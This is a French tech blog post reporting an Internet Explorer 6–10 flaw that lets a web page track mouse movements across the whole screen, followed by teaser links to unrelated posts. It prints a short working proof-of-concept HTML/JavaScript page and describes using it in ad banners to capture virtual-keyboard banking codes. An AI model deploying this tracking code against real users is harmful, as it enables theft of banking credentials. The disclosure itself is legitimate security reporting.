Korben, roi d’internet, logo bébé avec des lunettes en mode thug life Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Korben Upgrade your mind

Une faille pour suivre les mouvements de souris des Internautes dans Internet Explorer

Holy shit ! Une faille de sécurité dans Internet Explorer présente dans les versions 6 à 10 permet à un attaquant de suivre et d’enregistrer tous les mouvements de votre souris, et cela sur tout l’écran, même si IE est réduit dans la barre des tâches ou inactif ! Pire, les touches comme CTRL, SHIFT ou ALT sont aussi interceptables.

Cette faille présente un intérêt certain pour qui souhaite récupérer les codes entrés sur les claviers virtuels. On retrouve la plupart de ces « claviers » sur les sites des banques par exemple et le pirate pourrait simplement en achetant un emplacement pour de la pub sur un site même très grand public, piéger celle-ci et intercepter les mouvements de souris des internautes. Ça semble d’ailleurs être déjà entré en production sur certains serveurs de ad exchange (serveurs de bannières).
Voici une démo en vidéo pour que vous voyiez ce que ça donne…

Et l’exploit est on ne peut plus simple à implémenter…

Exploit
-----------------
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <title>Exploit Demo</title>
  <script type="text/javascript">
    window.attachEvent("onload", function() {
      var detector = document.getElementById("detector");
      detector.attachEvent("onmousemove", function (e) {
        detector.innerHTML = e.screenX + ", " + e.screenY;
      });
      setInterval(function () {
        detector.fireEvent("onmousemove");
      }, 100);
    });
  </script>
</head>
<body>
  <div id="detector"></div>
</body>
</html>

Si cela vous intéresse, sachez qu’il y a une démo testable pour IE sur ce site et même un jeu pour vous entrainer au chti pérate…

Merci à Paul pour le partage


Installer le shell Bash (Linux) sous Windows 10

L’année dernière, ça ne vous a pas échappé, Bash a fait son apparition sous Windows 10. C’est pour moi, la meilleure chose qui soit arrivée à Windows depuis un moment, car ça permet de lancer des outils Linux et de développer ses propres scripts Shell directement sous Windows. Le pied !

Mais même si c’est parfaitement fonctionnel, il faut quand même…

Lire la suite


Plus de 60 idées pour votre Raspberry Pi

Nous sommes nombreux à nous être procuré un petit ordinateur Raspberry Pi pour nous lancer dans des projets de ouf malade… C’est très cool, mais à part le classique Media Center XBMC, qu’avez-vous fait avec votre Raspberry Pi ?

Si vous séchez niveau idées, voici une petite sélection…

Lire la suite


Une astuce pour rendre Windows 10 plus rapide

Si vous trouvez que Windows 10 est un peu lent, que vos applications ne se lancent pas très vite, que vos compilations prennent du temps, voici une petite astuce débusquée par Brominou pour accélérer le bouzin.

Cliquez dans la zone de recherche de la barre Windows et tapez le mot clé « Performances ». Puis cliquez sur « Régler l’apparence et les performances de Windows » …

Lire la suite


Changer d’adresse IP rapidement

Une petite astuce pour ceux qui ne connaissent pas. Comment changer d’adresse IP à la volée.
Il suffit d’en demander une nouvelle à son provider si celui-ci accepte les IP dynamiques. Pour vérifier que vos manipulation ont eu l’effet escompté, vérifiez quelle est votre adresse IP….

Lire la suite